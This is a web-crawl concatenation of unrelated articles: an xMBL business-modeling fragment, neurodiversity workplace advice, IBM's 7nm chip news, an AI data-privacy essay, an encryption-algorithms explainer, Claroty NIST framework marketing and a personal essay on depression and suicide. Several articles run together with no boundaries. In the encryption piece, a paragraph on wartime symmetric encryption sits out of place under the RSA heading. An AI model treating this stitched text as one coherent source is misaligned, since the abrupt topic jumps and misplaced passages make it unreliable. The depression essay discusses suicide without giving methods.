- Supply chain management: xMBL can be used to model and optimize supply chain processes, leading to improved coordination and transparency between suppliers, manufacturers, and distributors.
- Strategic planning: xMBL can be used to create and analyze different business strategies, providing insights into which strategies are most likely to be successful.
While xMBL offers a number of benefits, there are also some challenges that organizations need to be aware of. These include:
- The need for change management: The adoption of xMBL requires a change in mindset and behavior from stakeholders across the organization. This can be a challenge to achieve, but it is essential for successful implementation.
- The need for training: xMBL is a complex language that requires training for users. This can be a significant investment of time and resources.
- The need for data integration: xMBL can be used to integrate data from a variety of sources. This can be a complex and time-consuming process, but it is essential for the accurate modeling of business processes.
Despite these challenges, xMBL is a powerful tool that can help businesses to achieve their digital transformation goals. As organizations continue to embrace the digital age, xMBL is likely to play an increasingly important role in business modeling.
Here are some additional thoughts on the future of xMBL:
- As xMBL matures, it is likely to become more user-friendly and easier to implement. This will make it more accessible to a wider range of organizations.
- xMBL is likely to be increasingly integrated with other technologies, such as artificial intelligence and machine learning. This will enable businesses to use xMBL to make more informed decisions and improve their operations.
- xMBL is likely to play a key role in the development of new business models and the adoption of new technologies. As the world becomes increasingly digital, businesses will need to be able to model and adapt their processes to stay ahead of the competition. xMBL is a powerful tool that can help businesses do just that. | <urn:uuid:d19c2b1f-1e88-43eb-8fb2-ce01e3797f82> | CC-MAIN-2024-38 | https://www.bptrends.com/xbml-extended-business-modeling-language/ | 2024-09-17T07:44:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00187.warc.gz | en | 0.940255 | 792 | 2.5625 | 3 |
People who are neurodivergent may process and solve problems in different ways. This can provide greater challenges when navigating a working world designed for neurotypical individuals. In the tech sector, half of those who identified as neurodivergent felt impacted by the conditions in the workplace, citing their work environment and company culture as exacerbating factors. When you consider that one in five people in the tech sector identify as definitely or likely neurodivergent, it highlights how many people may have felt a level of discomfort within their workplace. There has undoubtedly been a shift in the last few years with organizations having a greater awareness regarding the needs of neurodivergent individuals, but there is much to still do. Organizations understandably want to have productive and efficient teams. If workplace processes are attentive to individual needs, it fosters greater inclusivity and helps employees to feel valued and comfortable in their role. This then impacts positively on company culture and staff retention.
Recognizing Neurodiversity and Diverse Thinking
When it comes to the tech sector, neurodiverse thinking can add valuable insights and different perspectives. Some individuals may pay strong attention to detail and hyperfocus on a task, whilst others provide ‘bigger picture’ thinking when problem solving. Studies show people with dyslexia, for example, have strong analytical thinking skills and an eye for spotting trends, while autistic people may have higher levels of concentration and strong mathematical abilities. Each person brings their unique combination of strengths. These types of skills can be incredibly valuable to tech teams; for example, in cybersecurity, where it’s crucial to understand certain patterns and alerts and their meanings.
The diversity of this talent can lead to improved problem solving, creative thinking, and provide a more competitive edge for company success.
Assessments and Coaching Services
It’s important that organizations assess their work environment, starting with their recruitment processes and leading through each part of the employee journey. Employers should also be training managers to ensure every employee receives equal opportunities to be supported and thrive at work. Organizations should also embed employee assistance programs (EAP) into their businesses, particularly ones that understand neuro-inclusivity and can support a neurodiverse workforce. They should provide a focus on coaching and assessing how to best assist individuals.
This can also include launching a neurodiversity policy, to support those with a diagnosis or considering assessment. With this, organizations can be guided on mentoring or counselling to help them adapt well to new conditions or tasks and establish where they may need extra support. Managers should also be receiving awareness training on how they can best assist their team members going forward and to avoid bias in the workplace. For some employees, it may be beneficial to conduct a needs assessment with a neurodiversity expert via the organization's health provider to get a full picture of the employee's needs.
Regarding the bigger picture, organizations could also ensure that their health benefits are inclusive of neurodiverse employees and offer services to suit their requirements. This should involve access to therapy outside of the workplace and access to health services that can be specific to neurodivergent challenges.
Helping Neurodiverse Employees Navigate
One of the keys to getting the most out of any team member is understanding their needs. To enable this, it’s important that the organization fosters inclusive spaces in which neurodivergent individuals feel safe to disclose their diagnoses and don’t fear bias or discrimination at work.
Paying attention to working environments and sensory needs is crucial. Workplace adjustments do not need to be costly. For instance, lowering light intensity or moving people away from noisy areas to aid concentration. If this isn’t feasible, employers could provide noise cancelling earphones or screen filters. In fact, setting aside specific areas where all workers can decompress could be helpful to all employees.
Businesses that are able to, could also think about flexibility, and be aware that there isn’t a one-size-fits-all working model. To best accommodate their employees, employers should have open conversations to understand different needs and preferred working environments. This will help them to develop a greater empathetic leadership style, which in turn will help their employees feel more comfortable at addressing any preferences they may have.
The option to be able to work from home, as an example, may be better and more productive for some neurodivergent individuals. It’s important to remember that no individual will be the same, which is why having conversations and being open to receiving feedback is crucial to creating an inclusive culture. Coaching and co-coaching may also be helpful in this area.
While the benefits of a neuro-inclusive workplace are becoming more apparent, for this to continue, it is important that organizations take further steps to make all their staff feel safe and supported to discuss their needs. This leads to feeling valued and thriving, and ultimately a better workplace and agile business.
With Intel (INTC) having just brought its 14nm chips to market, IBM (IBM) has bolted way ahead by producing a functioning version of the semiconductor industry’s first 7-nanometer computer chip, sporting about four times the power of current processors.
Don’t hold your breath to see a 7nm chip on the market anytime soon. Still, the relatively rapid pace at which the 7nm technology was developed is huge.
A partnership that included IBM, GlobalFoundries and Samsung collaborated at the State University of New York Polytechnic Institute’s Colleges of Nanoscale Science and Engineering (SUNY Poly CNSE) to produce a working version of the chip, which could result in the ability to place more than 20 billion transistors on a fingernail-sized piece of silicon to power everything from smartphones to spacecraft.
The collaboration is tied to IBM’s pledge a year ago to commit some $3 billion to chip research and development over the next five years.
“For business and society to get the most out of tomorrow’s computers and devices, scaling to 7nm and beyond is essential,” said Arvind Krishna, IBM Research senior vice president and director.
“That’s why IBM has remained committed to an aggressive basic research agenda that continually pushes the limits of semiconductor technology,” he said. “Working with our partners, this milestone builds on decades of research that has set the pace for the microelectronics industry, and positions us to advance our leadership for years to come.”
Servers powering data centers typically deploy 22nm and 14nm processors, but the IBM, GlobalFoundries and Samsung consortium said 7nm technology could deliver at least a 50 percent power/performance improvement for next-generation mainframe and high-end systems to power the Big Data, cloud and mobile era. It took Intel years to move from 22nm to the more efficient and faster 14nm chips.
The 7nm technology is considered vital to meet computing’s future processing demands, including the cloud, big data, mobile, cognitive computing and other emerging technologies.
IBM said to achieve the higher performance, lower power and scaling benefits of 7nm technology its researchers adopted new processes and techniques, including some industry-first innovations such as Silicon Germanium (SiGe) channel transistors and Extreme Ultraviolet (EUV) lithography integration at multiple levels.
By Heather Dunn Navarro, Vice President, Product and Privacy, Legal, G & A, Amplitude
The ongoing AI revolution has brought about a data explosion: 70% of businesses report at least a 25% annual increase in data generation. This means that AI-powered data processing and analysis capabilities have never been more crucial. However, generating and analysing such extensive amounts of data raises significant user consent and privacy issues, particularly when privacy laws are evolving so rapidly.
Against this backdrop, understanding the impact of AI on data privacy is a non-negotiable. By staying ahead of changing consumer attitudes and legal landscapes, organisations can harness technological advancements while safeguarding customer data and remaining compliant.
AI’s role in businesses
AI-powered technologies offer numerous benefits, like being able to process vast amounts of data at speeds far beyond human capabilities. They can automatically organise data using predefined criteria or learned patterns, accelerating data management and reducing human error. AI can also carry out sophisticated analysis, identify patterns, and forecast future trends. All of this can help organisations become more strategic in their decision making.
Additionally, companies can use AI tools to help them keep up with new regulations. For instance, companies can deploy AI to check evolving regulations and automatically share updates with stakeholders. Going further, organisations can even use AI to monitor data usage and detect anomalies that indicate a potential risk.
Navigating the landscape of privacy laws
However, there are two sides to every coin. While AI can further compliance efforts, it can also create new privacy and security challenges. This is particularly true today, amid an ongoing global effort to strengthen data privacy laws. 71% of countries have data privacy legislation, and in recent years, this has evolved to encapsulate AI. In the EU, for instance, approval has been secured from the European Parliament around a specific AI regulatory framework. This framework imposes specific obligations on providers of high-risk AI systems and could ban certain AI-powered applications.
The fact is, AI-powered technology is immensely powerful. But, it comes with complex challenges to data privacy compliance. A primary concern here relates to purpose limitation, specifically the disclosure provided to consumers regarding the purpose(s) for data processing and the consent obtained. As AI systems evolve, they may find new ways to utilise data, potentially extending beyond the scope of original disclosure and consent agreement. As such, maintaining transparency in AI operations to ensure accurate and appropriate data use disclosures is critical.
Another critical area of concern is the potential of AI bias, which could result in AI systems making unfair decisions about a particular group of people. This could have huge consequences if unaddressed, such as leaving some unable to get mortgage offers, or unable to get into their university of choice.
To prevent any of these risky scenarios from occurring, companies must pay attention and respond to new AI regulations as they emerge.
The consumer comes first
Today, consumers are far more savvy when it comes to privacy, and are more concerned about how their data is used. Frequent mainstream news coverage of high-profile data privacy cases has heightened this. There is also the challenge of addressing public concerns, with nearly two-thirds of consumers worrying about AI systems lacking human oversight. Moreover, 93% believe irresponsible AI practices damage company reputations. Organisations must confront the critical challenge of how to innovate with AI while maintaining compliance and public trust.
However, the landscape is nuanced. Many consumers are willing to exchange data for enhanced personalisation and improved experiences. Successful businesses are finding a way to balance AI innovation, customer experiences, and protecting customers’ privacy rights.
To find that balance, organisations must focus on three key areas: transparency, informed consent, and customer control. Transparency requires communicating data practices clearly and accessibly, rather than hiding them away or presenting them in highly complicated language. When it comes to informed consent, it should be viewed as an ongoing process rather than a one-time checkbox, and consent should keep pace with AI as it evolves. Finally, empowering customers with granular control over their data – including options to opt in or out, access, correct, and delete their information – is crucial. This is especially pertinent given the potential for inaccurate data to lead to erroneous AI outcomes. By addressing all of these aspects, organisations can build trust while harnessing the power of AI for business growth.
Protecting customer data privacy is complex, but essential, and should never be viewed as a deterrent from pursuing AI initiatives. By striking the right balance between innovation and compliance, organisations can harness the power of AI to drive growth and improve customer experiences, all while maintaining the trust and confidence of their stakeholders.
Heather has been practicing law for nearly 20 years. She is currently VP, Product & Privacy, Legal at Amplitude, working with teams across the company to make sure they remain compliant and continue to enable their customers’ compliance. Over the course of her legal career, she has worn many hats, always focused on helping companies manage risk. | <urn:uuid:417e8bf5-62c2-41ee-96e6-72ed89d88a03> | CC-MAIN-2024-38 | https://www.architectureandgovernance.com/applications-technology/the-ai-balancing-act-innovating-while-safeguarding-consumer-privacy/ | 2024-09-14T23:39:44Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00487.warc.gz | en | 0.945335 | 1,016 | 2.515625 | 3 |
Symmetric encryption algorithms use the same secret key for both encryption and decryption. This means that the sender and the recipient of an encrypted message need to share a copy of the secret key via a secure channel before starting to send encrypted data. Symmetric encryption algorithms come in two different varieties: block and stream ciphers.
Types of Encryption Algorithms + Pros and Cons for Each
A block cipher encrypts data in fixed-size chunks. For example, the Advanced Encryption Standard (AES) uses a block length of 128 bits.
If the plaintext is shorter than the block length, then it is padded out to the desired length before encryption. At the other end, the recipient of the message will decrypt it and then remove the padding to restore the original message.
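One common scheme for this is PKCS#7-style padding, where every padding byte holds the number of bytes added, so the receiver knows exactly how much to strip. A minimal Python sketch (the 16-byte block size matches AES):

```python
BLOCK = 16  # AES block length in bytes

def pad(data: bytes) -> bytes:
    """PKCS#7-style: append n copies of the byte n, where n = bytes needed."""
    n = BLOCK - (len(data) % BLOCK)
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    """Strip the padding after decryption, validating it first."""
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")
    return data[:-n]

padded = pad(b"HELLO")  # 5 bytes -> 16 bytes (11 padding bytes, each 0x0b)
assert len(padded) == BLOCK
assert unpad(padded) == b"HELLO"
```

Note that a message already a multiple of the block size still gains a full block of padding; otherwise the receiver could not tell padding bytes from real data.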
If a plaintext is longer than the block length, then it is broken up into multiple different chunks for encryption. A block cipher mode of operation defines how these chunks are related to one another.
Each mode of operation has its pros and cons. For example, Electronic Code Book (ECB) mode is the simplest mode of operation. With ECB, each block is encrypted completely independently.
The downside of this is that blocks with the same plaintext produce the same ciphertext. The classic demonstration is an ECB-encrypted bitmap of the Linux penguin: the ciphertexts for pixels of a given color (black, white, etc.) are identical throughout the image, so the penguin's outline is still visible even in the "encrypted" data.
Other modes of operation eliminate this issue by interrelating the encryption of each block. Some also provide additional features, such as Galois Counter Mode (GCM), which generates a message authentication code (MAC) that verifies that data has not been modified in transit.
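The effect of interrelating blocks can be sketched with a toy stand-in cipher. Here a truncated keyed hash plays the role of the block cipher (it is not a real, invertible cipher; the point is only to show how ECB leaks repeated blocks while a CBC-style chain hides them):

```python
import hashlib

def toy_block_cipher(block: bytes, key: bytes) -> bytes:
    # Stand-in for a real block cipher: a keyed hash truncated to block size.
    # Not invertible and not secure -- for illustrating modes only.
    return hashlib.sha256(key + block).digest()[:len(block)]

def ecb_mode(blocks, key):
    # Each block is encrypted completely independently.
    return [toy_block_cipher(b, key) for b in blocks]

def cbc_mode(blocks, key, iv):
    # Each block is XORed with the previous ciphertext before encryption.
    out, prev = [], iv
    for b in blocks:
        mixed = bytes(x ^ y for x, y in zip(b, prev))
        prev = toy_block_cipher(mixed, key)
        out.append(prev)
    return out

blocks = [b"SAME PLAINTEXT!!"] * 2          # two identical 16-byte blocks
key, iv = b"secret key", b"\x00" * 16
assert ecb_mode(blocks, key)[0] == ecb_mode(blocks, key)[1]          # leaks
assert cbc_mode(blocks, key, iv)[0] != cbc_mode(blocks, key, iv)[1]  # hidden
```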
Example: The Advanced Encryption Standard (AES)
The most famous block cipher is the Advanced Encryption Standard (AES). This encryption algorithm was selected as the result of a contest run by the National Institute of Standards and Technology (NIST) to replace the aging Data Encryption Standard (DES).
AES is a family of three algorithms designed to use a 128-, 192-, or 256-bit encryption key. Each is built from a key schedule and an encryption routine.
The encryption algorithm of AES is largely the same for all three versions. It is divided into rounds, which are composed of a set of mathematical operations. The main difference between the different AES versions is the number of rounds used: 10, 12, and 14.
Each round of AES uses a unique round key that is derived from the original secret key. Deriving these round keys is the job of the key schedule. Each AES version's key schedule is different because they take different-length secret keys and produce different numbers of 128-bit round keys.
The other type of symmetric encryption algorithm is a stream cipher. Unlike a block cipher, a stream cipher encrypts a plaintext one bit at a time.
A stream cipher is designed based on the only completely unbreakable encryption algorithm: the one-time pad (OTP). The OTP takes a random secret key the same length as the plaintext and exclusive-ors (XORs) each bit of the plaintext with the corresponding bit of the key to produce the ciphertext.
Decryption with an OTP is the same operation as encryption. This is because anything XORed with itself is zero, and anything XORed with zero is unchanged. With a plaintext P, key K, and ciphertext C = P XOR K:

C XOR K = (P XOR K) XOR K = P XOR (K XOR K) = P XOR 0 = P
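The round trip is easy to verify in a few lines of Python, drawing a fresh random key as long as the message:

```python
import secrets

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

plaintext = b"ATTACK AT DAWN"
key = secrets.token_bytes(len(plaintext))  # random key, same length as message

ciphertext = xor_bytes(plaintext, key)     # encrypt: P XOR K
recovered = xor_bytes(ciphertext, key)     # decrypt: (P XOR K) XOR K = P
assert recovered == plaintext
```

The security of this scheme rests entirely on the key being truly random, as long as the message, and never reused.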
While it has great security, the OTP is rarely used because it is impractical to securely share the massive amounts of key material that it needs to work. A stream cipher uses the same idea as the OTP with a slightly less secure key.
Instead of a fully random key, a stream cipher uses a secret key to feed a pseudo-random number generator. By sharing the same secret key and algorithm, the sender and recipient of a message can crank out the same string of bits, enabling them to encrypt and decrypt a message.
Example: Rivest Cipher 4 (RC4)
RC4 is an example of a widely-used stream cipher. It was created by Ron Rivest in 1987 and was originally a trade secret of RSA Security. In 1994, the details of the cipher were leaked, making it publicly usable.
RC4 is used in a variety of different applications, including the WEP and WPA encryption standards for Wi-Fi. The cipher has some known vulnerabilities, especially for certain applications, but can still be used if some of the initial bytes of the generated keystream are discarded.
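Because the algorithm is public, RC4 is short enough to write out in full. The sketch below follows the textbook key-scheduling algorithm (KSA) and output loop (PRGA); given its known weaknesses, treat it strictly as an illustration, not something to protect real data with:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA): shuffle the state array S using the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation (PRGA): XOR each data byte with a keystream byte.
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

ciphertext = rc4(b"Key", b"Plaintext")
assert rc4(b"Key", ciphertext) == b"Plaintext"  # XOR stream: same call decrypts
```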
Unlike symmetric encryption, asymmetric cryptography uses two different keys for encryption and decryption. The public key is used to encrypt a message, while the private key is used for decryption.
The private key is a completely random number. The public key is derived from the private key using a mathematically “hard” problem.
This “hard” problem is based on a mathematical operation that is “easy” to perform but “hard” to reverse. A number of different “hard” problems are used, including integer-based ones and ones based upon elliptic curves.
Integer-based asymmetric cryptography uses two main “hard” problems. These are the factoring and discrete logarithm problems.
The factoring problem is based on the fact that it is relatively easy to multiply two numbers together but hard to factor the product. In fact, no efficient classical factoring algorithm is known: a naive approach must test potential divisors until it happens to find one of the two factors, which can take a very long time.
An asymmetric encryption algorithm based on the factoring problem will have a public key calculated as the product of two large secret primes. This calculation is easy to perform, but anyone wanting to recover the private key material from the public key needs to factor it, which is much harder.
The difficulty of multiplication grows polynomially with the length of the factors, but the difficulty of factoring grows exponentially. This makes it possible to find a “sweet spot”, where a system is usable but essentially unbreakable.
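The gap between the two directions is easy to feel even at toy scale: multiplying two primes is a single operation, while recovering them by naive trial division takes on the order of the smaller prime's magnitude (real RSA moduli use primes of 1024+ bits, far beyond any such search):

```python
import math

def trial_factor(n: int) -> int:
    """Brute-force search for a nontrivial factor -- the 'hard' direction."""
    for candidate in range(2, math.isqrt(n) + 1):
        if n % candidate == 0:
            return candidate
    raise ValueError("n is prime")

p, q = 10007, 10009            # two small primes
n = p * q                      # the 'easy' direction: one multiplication
assert trial_factor(n) == p    # the 'hard' direction: ~10,000 trial divisions
```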
The discrete logarithm problem uses exponentiation and logarithms as its “easy” and “hard” operations. Similar to factoring, the complexity of calculating logarithms grows much more quickly as the size of the exponent increases.
Example: Rivest-Shamir-Adleman (RSA)
Symmetric encryption is a simple cryptographic approach by today's standards; however, it was once considered state of the art. In fact, the German army used it to send private communications during World War II. The movie The Imitation Game actually does quite a good job of explaining how symmetric encryption works and the role it played during the war.
With symmetric encryption, a message that gets typed in plain text goes through mathematical permutations to become encrypted. The encrypted message is difficult to break because the same plain text letter does not always come out the same in the encrypted message. For example, the message “HHH” would not encrypt to three of the same characters.
To both encrypt and decrypt the message, you need the same key, hence the name symmetric encryption. While decrypting messages is exceedingly difficult without the key, the fact that the same key must be used to encrypt and decrypt the message carries significant risk. That’s because if the distribution channel used to share the key gets compromised, the whole system for secure messages is broken.
One of the most famous asymmetric encryption algorithms in existence is the one developed by Ron Rivest, Adi Shamir, and Leonard Adleman called RSA. This algorithm is based on the factoring problem.
A simple worked example shows how RSA operates. The plaintext (2) is raised to the power of the public key (5): 2^5 = 32. This value is then divided by a public modulus (14) and the remainder (4) is sent as the ciphertext: 32 % 14 = 4.
At the other end, the same operation is performed with the private key instead of the public key to produce the plaintext: (4^11) % 14 = 2. This calculation works because the public and private keys are selected so that they are inverses in the chosen modulus.
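Both directions of this worked example can be reproduced with Python's three-argument `pow`, which performs modular exponentiation:

```python
n = 14        # public modulus (2 * 7 -- a toy size, trivially factorable)
e, d = 5, 11  # public/private exponents: e*d = 55 = 1 (mod phi(14) = 6)

plaintext = 2
ciphertext = pow(plaintext, e, n)          # 2^5 mod 14 = 4
assert ciphertext == 4
assert pow(ciphertext, d, n) == plaintext  # 4^11 mod 14 = 2
```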
Integer-based asymmetric cryptography uses factoring and discrete logarithm problems to build secure encryption algorithms. Elliptic curve cryptography uses the same problems with a little twist.
Instead of using integers for its calculations, elliptic curve cryptography performs its operations on points of an elliptic curve. A private key is still a random number, but a public key is a point on the curve.
A few different mathematical operations are defined on these curves. The two important ones here are:
- Point Addition (equivalent to integer multiplication)
- Point Multiplication (equivalent to integer exponentiation)
On these curves, it is possible to perform calculations that are equivalent to the “easy” operations of the factoring and discrete logarithm problems. This means that the same basic algorithms can be adopted to use with elliptic curves.
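A sketch of those point operations on a tiny textbook curve, y^2 = x^3 + 2x + 2 over the integers mod 17 (illustrative only; real deployments use standardized curves with parameters of roughly 256 bits):

```python
P_MOD, A = 17, 2   # curve y^2 = x^3 + A*x + 2 over F_17
INF = None         # the point at infinity: the group's identity element

def point_add(p, q):
    if p is INF: return q
    if q is INF: return p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return INF                                   # p + (-p) = identity
    if p == q:                                       # doubling: tangent slope
        s = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD)
    else:                                            # addition: chord slope
        s = (y2 - y1) * pow(x2 - x1, -1, P_MOD)
    x3 = (s * s - x1 - x2) % P_MOD
    return (x3, (s * (x1 - x3) - y1) % P_MOD)

def point_mul(k, p):
    # Double-and-add: the elliptic-curve analogue of fast exponentiation.
    result = INF
    while k:
        if k & 1:
            result = point_add(result, p)
        p, k = point_add(p, p), k >> 1
    return result

G = (5, 1)                        # on the curve: 5^3 + 2*5 + 2 = 137 = 1 mod 17
assert point_add(G, G) == (6, 3)  # 2G
private_key = 7                   # a private key: just a random integer
public_key = point_mul(private_key, G)  # a public key: a point on the curve
```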
But why bother? Elliptic curve cryptography is useful because smaller key lengths provide the same level of security. This means that elliptic curve cryptography uses less storage, processing power, and energy to protect data at the same level as an equivalent integer-based algorithm. These savings can be important for resource-constrained systems like Internet of Things (IoT) devices or smartphones.
Pros and Cons of Symmetric and Asymmetric Encryption
Symmetric and asymmetric encryption algorithms both are designed to do the same job: protecting the confidentiality of data. However, they do their jobs in very different ways, and each approach has its pros and cons:
- Symmetric Encryption: The main advantage of symmetric cryptography is its efficiency. In general, symmetric encryption algorithms use less memory and processing power than asymmetric cryptography.
- Asymmetric Encryption: Asymmetric encryption does not require the two parties to securely share a secret key before sending encrypted messages. This makes it possible to securely communicate with anyone as long as you have their public key.
These different strengths mean that symmetric and asymmetric cryptography are often used together, like in the TLS protocol. Asymmetric encryption is used to securely exchange a symmetric key, and symmetric encryption is used for bulk data transfer.
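That division of labour can be sketched end-to-end. Below, a deliberately breakable toy RSA key wraps a random session key, and a hash-derived keystream stands in for the real symmetric cipher (TLS would use something like RSA-2048 or ECDHE plus AES-GCM instead):

```python
import hashlib
import secrets

n, e, d = 3233, 17, 2753   # toy RSA key (p=61, q=53) -- illustrative only

def keystream(key: int, length: int) -> bytes:
    # Hash-based keystream standing in for a real symmetric cipher.
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(f"{key}:{counter}".encode()).digest()
        counter += 1
    return out[:length]

def xor(data: bytes, ks: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, ks))

# 1. Sender wraps a random session key with the recipient's public key (n, e).
session_key = secrets.randbelow(n)
wrapped_key = pow(session_key, e, n)

# 2. Bulk data goes through the fast symmetric cipher.
message = b"bulk application data"
ciphertext = xor(message, keystream(session_key, len(message)))

# 3. Recipient unwraps the session key with private key d, then decrypts.
unwrapped = pow(wrapped_key, d, n)
assert unwrapped == session_key
assert xor(ciphertext, keystream(unwrapped, len(ciphertext))) == message
```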
Quantum Computing and Its Impacts on Cryptography
When discussing the pros and cons of different encryption algorithms, it is important to take into account the growth of quantum computing. Sufficiently powerful quantum computers would be able to break some of the asymmetric encryption algorithms in common use today.
The reason for this is that some of the “hard” problems used in asymmetric cryptography are not “hard” for quantum computers. While factoring is exponentially difficult for a classical computer, it only has polynomial difficulty for a quantum computer due to the existence of Shor’s algorithm.
If multiplication and factoring both have polynomial complexity, then it is impossible to build a cryptosystem using this problem that is both usable and secure. The same is true for the discrete logarithm problem. It is also broken once large enough quantum computers become available.
However, this does not mean that quantum computing will be the end of asymmetric cryptography. New problems have been discovered that are believed to be “hard” for quantum computers as well. This has led to the development of new post-quantum asymmetric encryption algorithms based upon these new “hard” problems. | <urn:uuid:e097895e-0120-45d7-a9e4-738383cfe22c> | CC-MAIN-2024-38 | https://www.keyfactor.com/education-center/types-of-encryption-algorithms/ | 2024-09-15T00:25:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00487.warc.gz | en | 0.932355 | 2,523 | 4.09375 | 4 |
The NIST cybersecurity framework is a set of guidelines and best practices developed by the National Institute of Standards and Technology (NIST) in response to an Executive Order from the U.S. government. The intention of the framework is to help organizations in critical infrastructure sectors manage and reduce cybersecurity risk.
This framework categorizes five core functions — identify, protect, detect, respond, and recover — as a flexible starting point for organizations to improve their cybersecurity awareness and preparedness. It also includes categories and subcategories which provide a more concrete action plan for specific departments or processes within an organization.
NIST guidelines are mandatory for U.S. government agencies and any organization doing business with the U.S. government. However, the framework should be adopted by all organizations — both public and private — concerned about their cybersecurity posture.
As the NIST CSF's first function, Identify encompasses a series of controls focused on developing an organizational understanding to manage cybersecurity risk to systems, people, assets, data, and capabilities.
Claroty Support: Claroty’s automated asset discovery capabilities and centralized asset inventory allow organizations to gain complete, real-time visibility into all IoT, IIoT, IoMT, and other connected devices — providing them with the XIoT asset inventory that is foundational to complying with the NIST cybersecurity framework.
As the NIST CSF's second function, Protect encompasses a series of controls focused on outlining the appropriate safeguards to ensure delivery of critical infrastructure services.
Claroty Support: Claroty equips organizations to harden their environments against cyber threats by harnessing expert-defined policies and granular access controls to embrace network segmentation and Zero Trust. We also offer newly enhanced Exposure Management capabilities, which allow organizations to better understand their CPS risk posture, better allocate their resources to improve it, and protect their critical CPS environments from growing threats.
As the NIST CSF's third function, Detect encompasses a series of controls focused on enabling the timely discovery of cybersecurity events.
Claroty Support: Claroty enables organizations to continuously monitor for and respond to the earliest indicators of threats — ranging from ransomware, to equipment failures, to malicious insiders, to IP theft, to misconfigurations —before they impact safety, compliance, or other assets.
As the NIST CSF's fourth function, Respond encompasses a series of controls focused on taking action against a detected cybersecurity incident.
Claroty Support: Claroty offers multiple detection engines to automatically profile all assets, communications, and processes in CPS networks. Our solutions have a deep understanding of proprietary industrial protocols and device behaviors to ensure each device receives the security policy appropriate for it — and prevents any future violations. We also provide a portfolio of threat capabilities that seamlessly integrate with your existing tech stack — bridging the IT-Industrial expertise gap.
As the NIST CSF's fifth function, Recover encompasses a series of controls focused on appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity incident.
Claroty Support: Claroty solutions provide change information on critical systems to assess whether affected systems can be put back into production, and KPIs for improvement through our analysis of network segmentation, critical system vulnerabilities, and attack vectors. We also enable information sharing for secure and efficient distribution of information critical to recover.
As the NIST CSF’s sixth function, Govern encompasses a series of controls focused on helping organizations establish and monitor their cybersecurity risk management, strategy, expectations, and policy.
Claroty Support: Claroty solutions provide risk scoring and vulnerability assessment reporting that give organizations the support they need to align with their expectations and goals. By assisting in the creation of cybersecurity policies across the organization and CPS devices, Claroty solutions ensure the ability to assess overall security postures, measurements of risks and threats in each unique environment, and enables the prioritization of risk tolerance for operational risk decisions.
Claroty xDome is a flexible SaaS platform purpose-built for all use cases & types of CPS on the entire industrial cybersecurity journey.
Medigate by Claroty is a SaaS-based healthcare cybersecurity platform that safeguards the connected devices that underpin patient care.
Claroty xDome Secure Access delivers frictionless, reliable, secure access for internal and third-party OT personnel. | <urn:uuid:f20c36b3-683f-447d-b5cd-5b15bc9a521c> | CC-MAIN-2024-38 | https://claroty.com/complying-with-the-nist-cybersecurity-framework | 2024-09-16T06:43:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00387.warc.gz | en | 0.923702 | 894 | 2.734375 | 3 |
These statistics make an uncomfortable read; they are distressing and show how we, as a global society, have failed to prevent not only unnecessary deaths but also the pain and the suffering of hundreds of thousands of families, friends, and relatives around the world. Suicide doesn’t only affect the individual affected, but also those around them. Suicide can be seen by many as a selfish act, as an act of weakness. But is it really? Can we really imagine what is going through that person’s mind and how desperate they must have felt that the only way out for them was to take their own life?
As a depression sufferer myself, I know how scary it is to be tormented by your own mind; to know that whatever you do, regardless of where you go or how hard you try, you cannot escape it, and you will never be able to. If you are bullied or tormented by a person, you can always change your environment, whether it is a school, university, workplace, etc. … But you cannot change your brain!
Our societies today encourage us to be ourselves, to show who we are, to accept each other. We aim to build a culture that celebrates differences, that is more human and understanding. And yet, when you are different, you can still feel that your culture and your community don’t accept you. It’s lonely to feel cast out by your peers or to think that wherever you go, you just don’t fit in anywhere. These feelings can be caused by many things – sexuality, race, culture, weight, personality, disability, mental and physical health, social status, religion.
The stigma and the shame around mental health are still so strong that many people don’t feel comfortable talking about their struggles. Should this make us ask ourselves the questions ‘Do we really accept others’ differences?’; ‘Do we approach people with an open mind?’; ‘Have we done enough or even anything at all to show people that it’s OK to be different?’; ‘Why do we need to put people in a box – after all, we come in all shapes and sizes?’
Many people with mental health issues feel that they aren’t understood; that others don’t know what it feels and looks like to feel tortured by your own mind. Well, let me tell you what this looks like! When you suffer from poor mental health, your mind can easily go into overdrive, and regardless of how much you try to stop it, you just aren’t able to. You think about everything, you are sensitive, both mentally and physically, to every single detail no matter how small it is, and you look at it at every angle, you think the worst about everything. You try and tell yourself that this is only in your head, and yet, it feels so, so real that you can’t stop thinking about it. You have to sit in your doctor’s office and hear the warning that the medication they give you will make you worse before it makes you better; that it can trigger suicidal thoughts and can cause some people to die by suicide because of the chemical reactions that happen in your brain.
At times like this, you need your friends and your family around more than ever, but the guilt of making them worry about you, and of not being able to just ‘pull yourself together’ and ‘get on with life’, is stronger. And this is the worst feeling in the world! You feel the weight of the world on your shoulders; you are exhausted but can’t sleep because your mind is in overdrive, with thousands of thoughts rushing in and out of your head like cars on a busy motorway; you cry about every single thing; you don’t want to go anywhere, see anyone or do anything.
